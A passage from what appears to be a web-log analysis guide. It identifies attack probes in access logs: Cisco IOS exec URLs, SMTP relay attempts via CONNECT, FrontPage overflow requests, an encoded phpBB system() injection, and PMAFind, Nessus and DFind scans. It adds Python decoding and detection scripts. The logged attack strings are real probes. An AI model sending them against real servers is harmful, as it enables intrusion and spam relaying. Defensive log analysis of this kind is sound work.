    211.115.xxx.xx - - [27/Feb/2006:14:07:16 +0900] "GET /level/16/exec/-///pwd  HTTP/1.0" 404 0 "-"
    211.115.xxx.xx - - [27/Feb/2006:14:22:24 +0900] "GET /level/16/exec/-///pwd  HTTP/1.0" 404 0 "-"
    211.115.xxx.xx - - [27/Feb/2006:14:42:59 +0900] "GET /level/16/exec/-///pwd  HTTP/1.0" 404 0 "-"
    211.115.xxx.xx - - [27/Feb/2006:15:32:15 +0900] "GET /level/16/exec/-///pwd  HTTP/1.0" 404 0 "-"
     


    - IP : Korea (CATV user, 211.115.224.0-211.115.255.255)
    - There is an automated scanning tool called cisco scanner.

    References:
    * Cisco Security Advisory: IOS HTTP Authorization Vulnerability
      http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
    * Old Cisco exploit tries to make a return:
      http://isc.sans.org/diary.php?storyid=1104
    * Multi-thread Cisco HTTP vulnerable scanner
      http://wayreth.eu.org/cisco_scanner.c

    15. Requests attempting to use the server as a proxy

     
    220.137.xx.xxx - - [12/Dec/2005:05:07:19 +0900] "CONNECT msa-mx6.hinet.net:25 HTTP/1.0" 405 231
    220.137.xx.xxx - - [12/Dec/2005:05:11:49 +0900] "CONNECT msa-mx6.hinet.net:25 HTTP/1.0" 405 231

    61.228.xxx.xxx - - [30/Jan/2006:10:42:28 +0900] "CONNECT msa-mx8.hinet.net:25 HTTP/1.0" 405 231 "-"
     


    - IP : Taiwan (TW, 220.137.0.0/16)
           Taiwan (TW, 61.228.0.0/14)
    - These are proxy requests made with the HTTP CONNECT method. The request
      CONNECT msa-mx6.hinet.net:25 tries to go through this web server to connect to port 25 (SMTP) of
      the msa-mx8.hinet.net server and then send spam mail. From the point of view of the
      msa-mx8.hinet.net mail server, the source IP of the spam is the web server, so the problem is
      that the location of the spammer is hidden.
    - The status code 405 above means that use of the CONNECT method was not allowed. If the code is
      200, connect to port 80 of the web server and check the result. If the result is not web page
      content, the method may be allowed, so restrict use of the CONNECT method in the web server
      configuration.

      
     
      $ telnet 123.123.123.123 80
      Trying 123.123.123.123...
      Connected to ????.???.??? (123.123.123.123).
      Escape character is '^]'.
      CONNECT xxx.xxx.xxx.xxx:25 HTTP/1.0

      ... output omitted ...
      
     


    References:

    * Sending spam mail via a proxy server
      http://linux4you.co.kr/bbs/view.php?id=lbd05&no=76
    * Re: Strange apache logs: CONNECT
      http://seclists.org/lists/incidents/2002/Nov/0131.html
    * HTTP/1.1 Method Definitions
      http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html

    16. Attack exploiting a vulnerability in Microsoft FrontPage Server Extensions

     
    85.224.xxx.xx - - [01/Dec/2005:00:33:20 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
    85.224.xxx.xx - - [01/Dec/2005:00:35:04 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
    85.224.xxx.xx - - [01/Dec/2005:00:43:42 +0900] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
     


    - IP : Netherlands (NL, 85.0.0.0 - 85.255.255.255)

    References:

    * CVE-2001-0341
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0341
    * Microsoft FrontPage Server Extensions Buffer Overflow (fp30reg.dll)
      http://www.securiteam.com/exploits/6A00J1P8UQ.html

    17. Attack exploiting the viewtopic.php vulnerability in phpBB

     
    130.63.xxx.xxx - - [23/Feb/2006:23:26:52 +0900] "GET /bbs/viewtopic.php?t=1112&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 302 642 "-" "Mozilla/4.0"
    60.248.xxx.xxx - - [23/Feb/2006:23:43:43 +0900] "GET /bbs/viewtopic.php?p=2113&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 302 642 "-" "Mozilla/4.0"
     


    - IP : Canada (CA, 130.63.0.0 - 130.63.255.255)
           Taiwan (TW, 60.248.0.0 - 60.248.255.255)
    - phpBB versions before 2.0.11 process the value passed in highlight= of viewtopic.php with the
      urldecode() function, which is a security problem. Through this vulnerability a remote attacker
      can execute commands of their choosing. The Santy worm, which automates this, spread rapidly from
      late 2004, and such attacks are still continuing.
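    The highlight= value from the two log lines above, decoded step by step as an added example (not part of the original article): PHP decodes the query string once, and the extra urldecode() the article mentions turns what is left (%27) into a quote. The function names are illustrative assumptions; the character codes are copied from the logged request.

```python
import re
from urllib.parse import unquote

# Character codes copied from the chr(...) chain in the logged request (section 17).
CODES = [112, 101, 114, 108, 32, 45, 101, 32, 34, 112, 114, 105, 110, 116,
         32, 113, 40, 106, 83, 86, 111, 119, 77, 115, 100, 41, 34]

# The request target as it appears in the access log, rebuilt from the codes
# so the long line does not have to be typed out again.
LOGGED_TARGET = (
    "/bbs/viewtopic.php?t=1112&highlight=%2527%252Esystem("
    + "%252E".join(f"chr({c})" for c in CODES)
    + ")%252E%2527"
)

CHR_RUN = re.compile(r"chr\(\d{1,3}\)(?:\.chr\(\d{1,3}\))*", re.I)
CHR_ONE = re.compile(r"chr\((\d{1,3})\)", re.I)


def unquote_rounds(value, limit=5):
    """Return the raw value followed by each further URL-decoded form."""
    stages = [value]
    while len(stages) <= limit:
        decoded = unquote(stages[-1])
        if decoded == stages[-1]:
            break
        stages.append(decoded)
    return stages


def expand_chr(expr):
    """Replace every chr(n).chr(m)... run with the string literal it builds."""
    literals = []

    def repl(match):
        text = "".join(chr(int(n)) for n in CHR_ONE.findall(match.group(0)))
        literals.append(text)
        return repr(text)

    return CHR_RUN.sub(repl, expr), literals


def analyse(request_target, param="highlight"):
    """Decode one query parameter of a logged request for the analyst."""
    query = request_target.partition("?")[2]
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if name == param:
            stages = unquote_rounds(raw)
            expanded, literals = expand_chr(stages[-1])
            return {
                "stages": stages,
                # More than one decoding round means the value was
                # encoded twice to survive the server's own decoding.
                "double_encoded": len(stages) > 2,
                "expanded": expanded,
                "literals": literals,
            }
    return None


if __name__ == "__main__":
    report = analyse(LOGGED_TARGET)
    for i, stage in enumerate(report["stages"]):
        print(f"round {i}: {stage[:60]}...")
    print("expanded:", report["expanded"])
```

    The decoded command only prints a fixed marker string, which is what a probe for the vulnerability looks like rather than a download-and-run payload.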

    References:

    * Blocking the phpBB worm in Apache and saving a separate log (by 좋은진호, 2005.2)
      http://coffeenix.net/board_print.php?bd_code=742

    * Database passwords is open. Passthru() is available. [Highlight Vulnerability]
      http://www.phpbb.com/security/final_reports.php?p=1

    18. Attack exploiting phpMyAdmin vulnerabilities

     
    81.5.xxx.xxx - - [17/Mar/2006:12:12:57 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:57 +0900] "GET /PMA/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /mysql/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /admin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:58 +0900] "GET /db/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /dbadmin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:12:59 +0900] "GET /admin/pma/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:00 +0900] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:00 +0900] "GET /admin/mysql/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysql-admin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /phpmyadmin2/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysqladmin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:01 +0900] "GET /mysql-admin/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:02 +0900] "GET /main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:02 +0900] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:03 +0900] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 0 "PMAFind"
    81.5.xxx.xxx - - [17/Mar/2006:12:13:04 +0900] "GET /myadmin/main.php HTTP/1.0" 404 0 "PMAFind"
     


    - IP : United Kingdom (GB=UK, 81.5.128.0 - 81.5.191.255)
    - PMAFind is a Windows tool made by a German to find vulnerabilities in PHPMyAdmin-Webinterfaces.
      It can take an IP range, or scan in bulk from a list of IPs saved in a file.

    References:

    * Pmafind.exe, PHPMyAdmin-Scanner
      http://www.governmentsecurity.org/forum/index.php?showtopic=17244
    * Multiple XSS Vulnerabilities in phpMyAdmin 2.6.0-pl2 and prior (2004.11)
      http://www.netvigilance.com/html/advisory0005.htm
    * phpMyAdmin Multiple Remote Vulnerabilities (2004.12)
      http://www.securityfocus.com/bid/11886
    * phpMyAdmin Remote Command Execution Vulnerability (2004.10)
      http://www.securityfocus.com/bid/11391
      
    19. Log left by the Korean PlantyNet web robot

     
    218.232.120.xx - - [20/Jan/2006:12:16:11 +0900] "GET /robotsxx.txt HTTP/1.0" 404 0 "PlantyNet_WebRobot_V1.9 dhkang@plantynet.com"
    218.232.120.xx - - [26/Jan/2006:20:48:54 +0900] "GET /robotsxx.txt HTTP/1.0" 404 0 "PlantyNet_WebRobot_V1.9 dhkang@plantynet.com"
     


    - IP : Korea (PlantyNet, 218.232.120.0-218.232.120.127)
    - It is unclear why the web robot of PlantyNet, which provides a harmful-site blocking service, requests
      robotsxx.txt rather than robots.txt. I asked PlantyNet about this, but have not received an answer yet.

    References :

    * A strange spider that looks for robotsxx.txt
      http://j2k.naver.com/j2k_frame.php/korean/www.tkamiya.net/sd5/archives/000601.html
      http://www.tkamiya.net/sd5/archives/000601.html

    20. When the vulnerability scanning tool Nessus is used to look for vulnerabilities

     
    61.177.xx.xxx - - [06/Mar/2006:11:14:09 +0900] "GET / HTTP/1.1" 200 12931 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:09 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:10 +0900] "GET /fpFWUpload.html HTTP/1.1" 404 532 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:11 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "GET /NessusTest17153.html HTTP/1.1" 404 532 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "GET /foo.jsp?param=<SCRIPT>foo</SCRIPT>.jsp HTTP/1.1" 406 535 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:12 +0900] "TRACE /Nessus8348.html HTTP/1.1" 200 288 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:13 +0900] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    61.177.xx.xxx - - [06/Mar/2006:11:14:13 +0900] "GET / HTTP/1.1" 200 35988 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
    ... (rest omitted) ...
     


    - IP : China (CN, 61.177.0.0 - 61.177.255.255)
    - These are the logs left when a scan is requested with the security vulnerability scanning tool Nessus.
      If you did not request the scan yourself, it is an attempt to find attack targets.

    References :

    * Vulnerability Scanner Nessus
      http://www.nessus.org/

    * Nessus analysis report
      http://www.certcc.or.kr/servlet/download?mode=secu_tools&file=linux_Nessus.pdf

    21. Logs left by the security scanning tool DFind

     
    211.202.x.xxx - - [15/Mar/2006:09:54:44 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-"
    211.202.x.xxx - - [15/Mar/2006:09:55:12 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-"
     


    - IP : Korea (IP range allocated to Hanaro Telecom, 211.202.0.0-211.202.3.255)
    - The log above is the signature left by the port scanning tool DFind.
      DFind is a tool that offers port scanning, ping checks, vulnerability scanning, web server type
      identification, and checking whether a given HTML file exists.

    References :

    * w00tw00t.at.ISC.SANS.DFind
      http://www.atlink.it/~conti/2006/03/04/w00tw00tatiscsansdfind-update/
    * w00tw00t
      http://isc.sans.org/diary.php?storyid=900
      http://isc.sans.org/diary.php?storyid=591
    * DFind
      http://class101.org
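
The scanner traces in sections 18, 20 and 21 can be picked out of an access log mechanically. The following is an added example, not part of the original article: it tags each line with the tool whose signature it carries and lists the probes the server answered with something other than 4xx. The sample lines are constructed after the excerpts above with documentation IP addresses, and treating the last quoted field as the User-Agent is an assumption about the log format.

```python
import re
from collections import defaultdict

# Constructed sample lines modelled on the excerpts above (documentation IPs).
SAMPLE = '''\
192.0.2.10 - - [17/Mar/2006:12:13:01 +0900] "GET /phpmyadmin2/main.php HTTP/1.0" 404 0 "PMAFind"
192.0.2.10 - - [17/Mar/2006:12:13:02 +0900] "GET /main.php HTTP/1.0" 404 0 "PMAFind"
198.51.100.7 - - [06/Mar/2006:11:14:09 +0900] "GET / HTTP/1.1" 200 12931 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
198.51.100.7 - - [06/Mar/2006:11:14:12 +0900] "GET /NessusTest17153.html HTTP/1.1" 404 532 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
198.51.100.7 - - [06/Mar/2006:11:14:12 +0900] "TRACE /Nessus8348.html HTTP/1.1" 200 288 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
203.0.113.5 - - [15/Mar/2006:09:54:44 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 335 "-"
203.0.113.9 - - [15/Mar/2006:10:00:00 +0900] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
'''.splitlines()

# Status and size are followed by zero, one or two quoted fields, because the
# excerpts log referer and User-Agent inconsistently.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+(?P<tail>(?: "[^"]*")*)\s*$')

SIGNATURES = [  # (tool, predicate over a parsed record)
    ("PMAFind", lambda r: "PMAFind" in r["agent"]),
    ("Nessus", lambda r: "Nessus" in r["agent"] or r["path"].startswith("/Nessus")),
    ("DFind", lambda r: r["path"].startswith("/w00tw00t.at.ISC.SANS.DFind")),
]

def parse(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    quoted = re.findall(r'"([^"]*)"', rec.pop("tail"))
    rec["agent"] = quoted[-1] if quoted else "-"  # assumption: last field is the UA
    rec["status"] = int(rec["status"])
    return rec

def classify(rec):
    return next((tool for tool, hit in SIGNATURES if hit(rec)), None)

def summarize(lines):
    """Per (ip, tool): probe count and the requests the server did not reject."""
    report = defaultdict(lambda: {"count": 0, "answered": []})
    for rec in filter(None, map(parse, lines)):
        tool = classify(rec)
        if tool is None:
            continue
        entry = report[(rec["ip"], tool)]
        entry["count"] += 1
        if not 400 <= rec["status"] < 500:  # 4xx: the probe found nothing
            entry["answered"].append((rec["method"], rec["path"], rec["status"]))
    return dict(report)

if __name__ == "__main__":
    for (ip, tool), entry in summarize(SAMPLE).items():
        print(ip, tool, entry["count"], entry["answered"])
```

In the sample, the only entries left for review are the Nessus requests answered with 200, including the TRACE request, which shows that the TRACE method is enabled on the server.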